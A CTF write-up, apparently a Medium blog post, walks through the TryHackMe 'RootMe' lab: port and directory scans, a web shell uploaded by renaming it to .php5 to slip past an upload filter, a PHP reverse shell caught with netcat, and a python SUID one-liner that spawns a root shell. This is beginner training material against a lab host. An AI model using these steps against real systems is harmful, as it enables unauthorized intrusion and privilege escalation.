Having fun with TryHackMe again. So, here is the write up and guideline to pass this Root Me challenge.

Room: https://tryhackme.com/room/rrootme
Level: Easy

Task: A CTF for beginners, can you root me?

Lets get started

Scan all ports range if there is available and every info available for this machine IP

# nmap -A -T4 -sS -sV -p- 10.10.78.111
....
....
22/tcp open ssh OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 2048 4a:b9:16:08:84:c2:54:48:ba:5c:fd:3f:22:5f:22:14 (RSA)
| 256 a9:a6:86:e8:ec:96:c3:f0:03:cd:16:d5:49:73:d0:82 (ECDSA)
|_ 256 22:f6:b5:a6:54:d9:78:7c:26:03:5a:95:f3:f9:df:cd (ED25519)
80/tcp open http Apache httpd 2.4.29 ((Ubuntu))
| http-cookie-flags:
| /:
| PHPSESSID:
|_ httponly flag not set
|_http-server-header: Apache/2.4.29 (Ubuntu)
|_http-title: HackIT - Home
....
....

There is 2 port open — 22 and 80. Ok now, need to find if there is any hidden directory since there is no hint in the webpage source code

# gobuster dir -u 10.10.78.111 -w wordlists/dirbuster/directory-list-2.3-medium.txt -t 20
....
/uploads (Status: 301) [Size: 314] [--> http://10.10.78.111/uploXXX/]
/css (Status: 301) [Size: 310] [--> http://10.10.78.111/css/]
/js (Status: 301) [Size: 309] [--> http://10.10.78.111/js/]
/panel (Status: 301) [Size: 312] [--> http://10.10.78.111/paXXX/]
....
....

There is 2 directory available. If open the /paXXX path, it shows the file upload page

Ok now, let’s try to upload c99 shell.

The file upload block .php extension file. Lets rename it to .php5 and see if the upload allowed it.

Alrighty. It’s uploaded. Open the /uploXXX page if the files is uploaded there

Ok now the file is actually uploaded here. Let’s open it.

C99 shell is now running. Time to hunt the flag. Go through the shell. Found the user flag 😬

Let’s continue the hunt.

find / -type f -perm -04000 -ls

There is list of SUID files. Need to refer GTFObins which one is available to execute. But its look like /usr/bin/python. C99 unable to run python script here. I need to use reverse shell. Since there is upload file available, i upload reverse shell php file.

Run netcat listener and open http://10.10.X.X/uploads/php-reverse-shell.php5

# nc -l -n -v -p 1234
Connection from 10.10.X.X:56058
Linux rootme 4.15.0-112-generic #113-Ubuntu SMP Thu Jul 9 23:41:39 UTC 2020 x86_64 x86_64 x86_64 GNU/Linux
17:51:30 up 1:41, 0 users, load average: 0.00, 0.00, 0.00
USER TTY FROM LOGIN@ IDLE JCPU PCPU WHAT
uid=33(www-data) gid=33(www-data) groups=33(www-data)
/bin/sh: 0: can't access tty; job control turned off
$

Ok now we gain access to terminal. From GTFObins, follow the sudo command

$ python -c 'import os; os.execl("/bin/sh", "sh", "-p")'
ls /root
root.txt
cat /root/root.txt

Done! Found the final flag!

Software Engineer at Teratotech.com

Get the Medium app

A button that says 'Download on the App Store', and if clicked it will lead you to the iOS App store
A button that says 'Get it on, Google Play', and if clicked it will lead you to the Google Play store